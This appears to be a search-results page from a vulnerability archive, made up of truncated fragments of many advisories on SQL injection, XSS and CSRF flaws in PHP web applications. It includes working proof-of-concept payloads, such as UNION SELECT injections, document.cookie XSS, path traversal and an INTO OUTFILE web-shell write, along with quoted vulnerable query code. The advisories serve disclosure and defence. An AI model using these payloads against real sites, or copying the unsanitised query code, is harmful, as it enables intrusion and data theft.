Next Page >>
SQL query
1. Sql Injection vulnerability in "account-inbox.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter "origmsg" is used in sql query
Preconditions:
1. attacker must be logged in as valid user
Test:
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SiT! Support Incident Tracker, which can be exploited to perform SQL injection, cross-site scripting, cross-site request forgery attacks.
1) Input passed via the "start" GET parameter to /portal/kb.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/portal/kb.php?start=SQL_CODE_HERE
conduct spoofing, SQL injection, and script insertion attacks and by
malicious people to conduct SQL injection and script insertion
attacks.
1) Input passed via the "login" parameter to index.php is not properly
sanitised before being used in an SQL query. This can be exploited to
manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed via the "login" and "password" parameters to index.php
is not properly sanitised before being displayed to the user. This can
be exploited to insert arbitrary HTML and script code, which will be
http://[host]/exportcsv/exportcsv_index.php?action=export_page&module=../../../../tmp/file
Successful exploitation of this vulnerability requires attacker to be registered and logged-in.
2) Input passed via the "sel_domain_id" POST parameter to /obm.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
//Connect to database
include ("../includes/dbinfo.php");
// Insert data
$sqlquery = "UPDATE " . usersdb . " SET "
."Password ='" .$Password2 ."' WHERE ID ='" .$ID ."'";
$results = mysql_query($sqlquery);
-----------------[ source code end ]-----------------------------------
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Help Desk Software, which can be exploited to perform SQL injection, cross-site scripting and cross-site request forgery attacks.
1) Input passed via the user POST parameter to index.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
The following PoC code is available:
http://[host]/index.php?message=1&message_type=%22%20onmouseover=alert%28document.cookie%29%3E
4) Input passed via the "user2" GET parameter to ask_information.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/ask_information.php?common_lessons=1&user1=professor&user2=%27%20union%20select%201,version%28%29%20--%20
GET /phpshop/admpanel/ HTTP/1.1
Cookie: log="><script>alert(document.cookie)%3b</script>
7) Input passed via the "id" GET parameter to /phpshop/admpanel/catalog/adm_catalog_new.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/phpshop/admpanel/catalog/adm_catalog_new.php?id=3%20AND%201=1
BookLibrary component for Joomla, which can be exploited by malicious
people to conduct SQL injection attacks.
1) Input passed via the "bid[]" parameter to index.php (when "option"
is set to "com_booklibrary" and "task" is set to "lend_request") is
not properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed via the "bid[]" parameter to index.php (when "option"
is set to "com_booklibrary" and "task" is set to "save_lend_request")
is not properly sanitised before being used in a SQL query. This can
http://[host]/comm/clients.php/%22%3E%3Cimg%20src=1%20onerror=javascript:alert%28document.cookie%29%3E
http://[host]/commande/index.php/%22%3E%3Cimg%20src=1%20onerror=javascript:alert%28document.cookie%29%3E
Successful exploitation of this vulnerabilities requires that Apache's directive "AcceptPathInfo" is set to "on" or "default" (default value is "default")
2) Input passed via the "sortfield", "sortorder" and "sall" GET parameters to /user/index.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/user/index.php?sall=1%%27%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14%20--%20
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
1. 'id' SQL injection
Vulnerability found in contact.php script.
User-defined variable id is not properly sanitized before being used in SQL query.
This can be used to execute arbitrary SQL query.
2. 'email' SQL injection
Vulnerable script is contact.php script.
'email' parameter is not properly sanitized before being used in SQL query.
========
1.1
A remote SQL Injection vulnerability is detected in the DHTMLX v.3.0 Professional|Standard Edition.
The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands
on the affected application dbms. Successful exploitation of the vulnerability results in dbms & application compromise.
the vulnerability is located on the sql query module of the database administrator function which allows to inject via
POST request the database tables.
Vulnerable Module(s):
[+] SQL Query - Command Module
entire dataset of usernames and passwords is passed to the workstation
to parse and authenticate. Any network sniffer can catch the dataset
to be cracked offline.
"No Encryption" databases passes every password in plain text as it is
returned from the sql query.
"Standard Encryption" databases use a rotational encryption to secure
the password as it is returned from the sql query.
"Enhanced Encryption" databases use the Standard Encryption and then
save it into a binary data field which is then returned from the sql
query.
The following PoC code is available:
http://[host]/licence/view.php?framed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
5) Input passed via the "login[username]" POST parameter to index.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/admin/new_attributes_include.php?cPath=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
2) Multiple SQL Injections in osCmax: CVE-2012-1665
2.1 Input passed via the "status" GET parameter to /admin/stats_monthly_sales.php is not properly sanitised before being used in SQL query. This can be exploited to alter SQL queries.
The vulnerability usage is limited to the "INTO FILE" clause. This vulnerability requires administrative privileges, however can be exploited via the CSRF technique. Remote attacker should make logged-in website administrator open the following URL (in hidden iframe for example):
http://[host]/admin/stats_monthly_sales.php?status=0 union select '<? php_code ?>' INTO OUTFILE '../../../path/to/site/file.php'
Depending on MySQL and PHP configurations, as well as file system permissions this PoC should create arbitrary PHP file within the web root.
####################
+--> Blind SQL Injection
The archive page is vulnerable to SQL injection. The GET variable,
namely 'view',
is not sanitized correctly in the SQL query. This hole can be used
for extracting
admin password. For deatils see 'Exploits' section.
####################
- Exploits/PoCs:
exploited to manipulate SQL queries by injecting
arbitrary SQL code. The following is the affected code:
$mealid = JRequest::getVar('mealid');
$SQLQuery = "INSERT INTO #__miniwork_canteen_order (jo_userid, jo_mealid, jo_created, jo_createdby, jo_changed, jo_changedby)
VALUES (".$user->id.", ".$mealid.", NOW(), '".$user->sSecondName." ".$user->sFirstName."', NOW(), '".$user->sSecondName." ".$user->sFirstName."')";
$mealid = JRequest::getVar('mealid');
$SQLQuery = "DELETE FROM #__miniwork_canteen_order WHERE jo_mealid = ".$mealid." AND jo_userid = ".$orduser->id.";";
allows the injection of direct SQL commands. By exploiting the
vulnerability, an attacker gains access to all records stored in the
database. In this instance of SQL injection, the vulnerability can
additionally be used to get access to other user accounts and their
data. During the creation of an account group by a non-sysadmin user
the account group name is not validated and is used in a SQL query.
This allows for the injection of arbitrary SQL code. The account group
creation can be accessed from the menu -> Master Data -> More ->
Account Groups.
Some of the new features include:
* Added multithreading support to set the maximum number of concurrent
HTTP requests.
* Implemented SQL shell (--sql-shell) functionality and fixed SQL query
(--sql-query, before called -e) to be able to run whatever SELECT
statement and get its output in both inband and blind SQL injection attack.
* Added an option (--privileges) to retrieve DBMS users privileges, it
also notifies if the user is a DBMS administrator.
Status: Unpatched. No reply from developer(s)
PoC: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
It is possible to inject arbitrary SQL query using "start" parameter in index.php script.
Parameter "start" is used in SQL query without any sanitation.
--------PoC/Exploit--------
PoC code is available at:
http://evuln.com/vulns/154/exploit.html
---------Solution----------
--------Description--------
http://evuln.com/vulns/174/description.html
SQL Injection in "wsnuser" Cookie
It is possible to inject arbitrary SQL query using "wsnuser" cookie parameter in the "index.php" script.
Parameter "wsnuser" is used in SQL query without proper sanitation.
--------PoC/Exploit--------
PoC code is available at:
http://evuln.com/vulns/174/exploit.html
PoC: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
It is possible to inject arbitrary SQL query using "fold" and "site" parameters in "editCategory.php" and "editSite.php" scripts.
Parameters "fold" and "site" are used in SQL query without any sanitation.
Condition: magic_quotes: off
PoC: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
It is possible to inject arbitrary SQL query using "id" parameter in "getURL.php" script.
Parameter "id" used in SQL query without any sanitation.
Condition: magic_quotes: off
--------PoC/Exploit--------
LogAnalyzer version 3.4.2 and probably below suffers from multiple vulnerabilities:
- SQL Injection
1) The script admin/views.php contains a SQL-Injection vulnerability when used to create a new view. It can be exploited by a non-admin user (with write access) to insert arbitrary data into logcon_views table.
The vulnerability exists due to the failure in the script to sanytize the POST variable "Columns" before use it to build a SQL query.
This PoC creates an arbitrary record into logcon_views table.
<form method=post action="http://127.0.0.1/loganalyzer-3.4.2/admin/views.php">
original HTTP POST request.
The following examples show the two queries that are executed when the
<sql> element contains the string "0=1) /* " and the <order_by> element
contains the string "*/)--". User input that is active within an SQL
query is marked with a ">", user input that begins or ends a comment is
marked with a "+", and application-provided query parts that are now
commented out are marked with a "|":
----- Query 1a ---------------------------------------------------------
Select EVN_ID, EVNRCR_ID, evntitle, evnnote, evnlocation, evnstartdate,
http://www.tippingpoint.com
-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of IBM Informix Database Server. SQL query
execution privileges are required to exploit this vulnerability.
The specific flaw exists within the oninit process bound to TCP port
9088 when processing the arguments to the USELASTCOMMITTED option in a
SQL query. User-supplied data is copied into a stack-based buffer
WHERE answerid = " . $vbulletin->GPC['answerid']
);
[----------- source code snippet end -----------]
It appears, that user submitted parameter "answer" is not properly sanitized
before using in sql query. As result sql injection is possible. Test will
induce sql error message:
Invalid SQL:
UPDATE vb_hvanswer
SET answer = 'war'axe'
http://[host]/AgedDebtors.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/AgedSuppliers.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Successful exploitation of this vulnerabilities requires that Apache's directive "AcceptPathInfo" is set to "on" or "default" (default value is "default").
2) Input passed via the "reportid" GET parameter to /reportwriter/ReportMaker.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/reportwriter/ReportMaker.php?action=go&reportid=SQL_CODE_HERE
PoC: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
It is possible to inject arbitrary SQL query using "q" parameter in search.php script.
Parameter "q" used in SQL query without any sanitation.
Condition: magic_quotes: off
--------PoC/Exploit--------
PoC: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
It is possible to inject arbitrary SQL query using "postid" parameter in "postview.php" script.
Parameter postid used in SQL query without any sanitation.
Condition: magic_quotes: off
--------PoC/Exploit--------
Next Page>>
|
